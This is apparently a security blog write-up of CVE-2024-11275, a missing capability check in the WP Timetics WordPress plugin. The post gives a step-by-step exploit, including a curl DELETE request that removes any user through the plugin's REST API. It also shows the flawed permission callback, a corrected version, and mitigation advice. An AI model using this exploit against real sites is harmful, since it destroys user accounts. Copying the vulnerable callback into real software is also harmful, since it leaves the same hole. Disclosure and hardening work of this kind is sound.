CVE-2024-11275 - Critical Vulnerability in WP Timetics Plugin Lets Customers Delete Any Users – Full Analysis & Exploit Demo

Discovered: Early 2024
Severity: High
Affected Plugin: WP Timetics
Vulnerable Versions: ≤ 1..27
Plugin Purpose: Appointment booking & scheduling with AI features
Bug Type: Broken Access Control / Missing Capability Check
Reference: WPScan Advisory

TL;DR

The WP Timetics plugin, a popular WordPress scheduling addon, is vulnerable to an *unauthorized data loss* flaw. Any logged-in customer, or anyone with higher privileges, can delete *any user* on the site—including admins—via a weak REST API endpoint. The problem is due to a missing capability check.

Timetics exposes a REST API endpoint

/wp-json/timetics/v1/customers/

This endpoint allows operations (including deletion) on customer data. The plugin *should* check if the logged-in user has the right privilege or role before letting them delete someone. But all it checks is if you’re logged in as a Timetics Customer (the lowest plugin-level access)! This means, with a standard customer account (which customers can *register for themselves!*), you can perform dangerous actions on the site.

The Impact

- Any authenticated user with a Timetics “Customer” role (or above) can delete any user (including admins) from WordPress via the API.

Attackers can automate user deletion with simple tools.

- Could be used for targeted sabotage, privilege escalation, or denial-of-service on WordPress user accounts.

Step 1: Register or log into a site as any customer

Just create a customer account using Timetics' registration page, or use an existing customer account.

Step 2: Grab your session cookie

Get your wordpress_logged_in cookie for authentication.

Step 3: Send DELETE request to the REST API endpoint

curl -X DELETE https://victim-site.com/wp-json/timetics/v1/customers/1 \
  -b "wordpress_logged_in_xxxx=YOUR_COOKIE_HERE"

Replace YOUR_COOKIE_HERE with your session cookie.

Result: The targeted user is deleted from the WordPress database!

Here’s what happens in the plugin’s code (simplified)

register_rest_route( 'timetics/v1', '/customers/(?P<id>\d+)', array(
    'methods' => 'DELETE',
    'callback' => 'timetics_delete_customer',
    // PROBLEM: No proper 'permission_callback'
    'permission_callback' => function() {
        // Only checks if user is logged in (is_user_logged_in())
        return is_user_logged_in();
    }
) );

The permission callback should check for capability, like current_user_can( 'delete_users' ), but the plugin just checks if you’re logged in.

So, the delete function can be abused by any basic customer!

Mitigation

1. Update immediately: The developer has addressed this in later versions (changelog).
2. Restrict access to the vulnerable endpoint with a plugin like Wordfence or Disable REST API.

Make sure your REST route checks for real permissions

'permission_callback' => function() {
    // Only let admins or trusted roles delete users
    return current_user_can('delete_users');
}

Resources & Further Reading

- WPScan Official Advisory
- Plugin Homepage
- REST API Permission Callbacks

Final Thoughts

This bug highlights why capability checks are critical in WordPress plugins. Never trust just authentication—always validate a user’s capabilities. If you use WP Timetics, update now! This exploit is trivial to automate and could devastate your user base in seconds.

Timeline

Published on: 12/13/2024 09:15:04 UTC